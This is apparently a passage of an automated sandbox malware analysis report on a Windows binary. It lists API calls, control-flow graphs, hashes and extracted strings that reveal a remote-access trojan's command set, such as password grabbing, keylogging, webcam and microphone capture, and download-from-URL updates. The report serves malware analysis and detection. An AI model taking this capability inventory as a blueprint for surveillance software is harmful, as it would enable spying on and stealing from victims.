                              Control-flow Graph

                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,6A3F5E04), ref: 0040F05A
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F064
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F06D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$?length@?$basic_string@V12@$??4?$basic_string@?substr@?$basic_string@V01@V01@@$??0?$basic_string@?find@?$basic_string@D@1@@
                              • String ID:
                              • API String ID: 3435050692-0
                              • Opcode ID: b0a590d7568685fd502d2526f30560aa99c2d8ff11d0c264287033065e04a1e4
                              • Instruction ID: 05261c11a0c2935763cb9f53f66ce9cc739fdea45f744e86f2ec5e7b64bf2302
                              • Opcode Fuzzy Hash: b0a590d7568685fd502d2526f30560aa99c2d8ff11d0c264287033065e04a1e4
                              • Instruction Fuzzy Hash: 6F31997150014AABCB14EFA1ED9DCDE7B79EE54305B108079F406A31A0EF75AF4ACB68
                              Function 0040FD88 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 204 40fd88-40fdfd __set_app_type __p__fmode __p__commode call 40ff13 207 40fe0b-40fe62 call 40fefe _initterm __getmainargs _initterm 204->207 208 40fdff-40fe0a __setusermatherr 204->208 211 40fe64-40fe6c 207->211 212 40fe9e-40fea1 207->212 208->207 215 40fe72-40fe75 211->215 216 40fe6e-40fe70 211->216 213 40fea3-40fea7 212->213 214 40fe7b-40fe7f 212->214 213->212 217 40fe81-40fe83 214->217 218 40fe85-40fe96 GetStartupInfoA 214->218 215->214 219 40fe77-40fe78 215->219 216->211 216->215 217->218 217->219 220 40fe98-40fe9c 218->220 221 40fea9-40feab 218->221 219->214 222 40feac-40fed9 GetModuleHandleA call 407452 exit _XcptFilter 220->222 221->222
                              APIs
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                              • String ID:
                              • API String ID: 801014965-0
                              • Opcode ID: 1092ec1c6f5248e51e2d757a765f21b697df3d527996ee472cc7716abd981555
                              • Instruction ID: 8e1b74afc4b48038761e77c4c7ed844e3b6dc848ee47d0f1d3c708b4ab1b3d45
                              • Opcode Fuzzy Hash: 1092ec1c6f5248e51e2d757a765f21b697df3d527996ee472cc7716abd981555
                              • Instruction Fuzzy Hash: 474185B1840708DFC730DFA4D845ADA7BB8FB49710F20413BF551A76A1D7785885CBA8
                              Function 00408E97 Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 225 408e97-408ebe RegOpenKeyExA 226 408ec0-408eec RegQueryValueExA RegCloseKey 225->226 227 408eed-408ef0 225->227
                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000001,00407538,00000000,00020019,00407538,?,?,?,00407538,80000001,00000000,?,?,?,?,004108CC), ref: 00408EB6
                              • RegQueryValueExA.KERNELBASE(00407538,?,00000000,80000001,?,00000000,00000000,?,?,?,00407538,80000001,00000000), ref: 00408ED4
                              • RegCloseKey.KERNELBASE(00407538,?,?,?,00407538,80000001,00000000,?,?,?,?,004108CC,00000000), ref: 00408EDF
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID:
                              • API String ID: 3677997916-0
                              • Opcode ID: 6dddc39d83993ea91a79dd0c836d699722d7f7815938bb7eeb73e5aee30751c6
                              • Instruction ID: 3bc629e04baa43d7f680f8c54f18a859d153aa5dc69768ea16728ed6502bf047
                              • Opcode Fuzzy Hash: 6dddc39d83993ea91a79dd0c836d699722d7f7815938bb7eeb73e5aee30751c6
                              • Instruction Fuzzy Hash: DFF01D76900218BFDF118F90ED05FDA7FB8EB08760F108166FA05EA150E7B1DA50EB94

                              Non-executed Functions

                              Function 0040A71E Relevance: 607.3, APIs: 286, Strings: 60, Instructions: 1780sleepfilewindowCOMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A737
                              • SetEvent.KERNEL32(?), ref: 0040A740
                              • CloseHandle.KERNEL32(?), ref: 0040A749
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00415268), ref: 0040A75A
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A766
                                • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040A796
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,ping), ref: 0040A7AB
                              • GetTickCount.KERNEL32 ref: 0040A7BD
                                • Part of subcall function 0040ED35: _itoa.MSVCRT ref: 0040ED53
                                • Part of subcall function 0040ED35: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A186,?,00000000), ref: 0040ED67
                                • Part of subcall function 0040E898: GetLastInputInfo.USER32(00000000), ref: 0040E8A8
                                • Part of subcall function 0040E898: GetTickCount.KERNEL32 ref: 0040E8AE
                                • Part of subcall function 0040E85D: GetForegroundWindow.USER32 ref: 0040E866
                                • Part of subcall function 0040E85D: GetWindowTextW.USER32(00000000,?,00000200), ref: 0040E879
                                • Part of subcall function 0040E85D: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040E88D
                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,pong,00415268,00000000,00000001,00415268,00000000,00000000,?,?,?,00000000), ref: 0040A81C
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,00415268,00000000,00000000,?,?,?,00000000), ref: 0040A82C
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00000000,00000000,?,?,?,00000000), ref: 0040A83C
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00000000,00000000,?,?,?,00000000), ref: 0040A84C
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00415268,00000000,00000000), ref: 0040A85C
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040A869
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A876
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A897
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8A0
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8AC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8B8
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8C4
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8D0
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8DC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8E8
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8F4
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8FD
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A906
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040A918
                              • atoi.MSVCRT ref: 0040A925
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000001,00410844), ref: 0040A965
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,filemgr), ref: 0040A9A2
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A9BA
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,close), ref: 0040B63C
                              • exit.MSVCRT ref: 0040B646
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,uninstall), ref: 0040B655
                              • Sleep.KERNEL32(00000064), ref: 0040B668
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,updatefromurl), ref: 0040B683
                              • Sleep.KERNEL32(00000064), ref: 0040B69A
                              • getenv.MSVCRT ref: 0040B6BB
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040B6C6
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040B6D1
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B6DE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B6E9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B6F2
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040B6FF
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040B712
                              • URLDownloadToFileA.URLMON(00000000,00000000), ref: 0040B71A
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040B72C
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B73D
                                • Part of subcall function 004026F2: GetLocalTime.KERNEL32(?,76E50440,00415A30,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 0040271B
                                • Part of subcall function 004026F2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Timeout changed to %i,?,?,0040A946,?,?), ref: 00402747
                                • Part of subcall function 004026F2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 00402752
                                • Part of subcall function 004026F2: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 0040275C
                                • Part of subcall function 004026F2: printf.MSVCRT ref: 00402763
                                • Part of subcall function 004026F2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040276F
                                • Part of subcall function 004026F2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402778
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,updatefromlocal), ref: 0040B751
                              • Sleep.KERNEL32(00000064), ref: 0040B768
                              • getenv.MSVCRT ref: 0040B789
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040B794
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040B79F
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B7AC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B7B7
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B7C0
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000032,00000001), ref: 0040B7CD
                              • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040B7DA
                              • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040B7E6
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000002), ref: 0040B7FC
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040B80F
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000000), ref: 0040B81C
                              • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040B828
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040B837
                              • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040B84B
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,msgbox), ref: 0040B862
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003), ref: 0040B876
                              • atoi.MSVCRT ref: 0040B87D
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,-00010000), ref: 0040B892
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040B8A5
                              • MessageBoxA.USER32(00000000,00000000), ref: 0040B8AE
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,keyinput), ref: 0040B8C2
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040B8D6
                              • atoi.MSVCRT ref: 0040B8DD
                                • Part of subcall function 0040E46D: SendInput.USER32(00000001,?,0000001C,00415268), ref: 0040E495
                                • Part of subcall function 0040E46D: SendInput.USER32(00000001,00000001,0000001C), ref: 0040E4A6
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,mclick), ref: 0040B8F5
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003), ref: 0040B909
                              • atoi.MSVCRT ref: 0040B910
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040B920
                              • atoi.MSVCRT ref: 0040B927
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040B937
                              • atoi.MSVCRT ref: 0040B93E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A880
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,keepaliveoff), ref: 0040A988
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,deletefile), ref: 0040B60D
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040B621
                              • DeleteFileA.KERNEL32(00000000), ref: 0040B628
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BC78
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BC8C
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@V?$basic_string@$??0?$basic_string@?c_str@?$basic_string@$Hstd@@$??8std@@$V01@@$V10@0@$D@1@@atoi$?length@?$basic_string@D@std@@@std@@G@2@@std@@G@std@@$InputSleepV10@V12@$CountFileSendTickWindowgetenv$??0?$basic_ofstream@??4?$basic_string@?close@?$basic_ofstream@?find@?$basic_string@?is_open@?$basic_ofstream@?size@?$basic_string@?substr@?$basic_string@?write@?$basic_ostream@CloseD?$basic_ofstream@DeleteDownloadEventForegroundG@1@@HandleInfoLastLocalMessageTextTimeV01@V10@@_itoaexitprintf
                              • String ID: AppData$OSpower$PowrProf.dll$SetSuspendState$autogetofflinelogs$clearlogins$clipboarddata$close$closeprocfromwindow$closewindow$cmdoutput$consolecmd$deletefile$deletekeylog$dlldata$dllurl$downloadfromlocaltofile$downloadfromurltofile$dwnldscr$emptyclipboard$execcom$filemgr$freecamcap$freescrcap$getcamlib$getclipboard$getofflinelogs$getproclist$getscrslist$getwindows$initcamcap$initfun$initializescrcap$initklfrm$initregedit$initremscript$keepaliveoff$keyinput$maxwindow$mclick$miccapture$msgbox$open$openaddress$ping$pong$prockill$proclist$pwgrab$restorewindow$scrcap$screenshotdata$scrslist$setclipboard$startonlinekl$stopmiccapture$stoponlinekl$uninstall$updatefromlocal$updatefromurl
                              • API String ID: 4235549877-3954364873
                              • Opcode ID: d803311f4985f16bfd57f944ab0b11466922ca7c54233d1ce0ba41a78679c5cb
                              • Instruction ID: 15dfb3fcceeeb11733fb975214f02c8d6630f90493aa5ef66b82fcebf2304a7a
                              • Opcode Fuzzy Hash: d803311f4985f16bfd57f944ab0b11466922ca7c54233d1ce0ba41a78679c5cb
                              • Instruction Fuzzy Hash: DFC26271940219ABDF04A7A1EC5AEEE7738EF55304F10447AF502B20E1DFB89A89CB5D
                              Function 0040BEA2 Relevance: 196.6, APIs: 97, Strings: 15, Instructions: 649COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
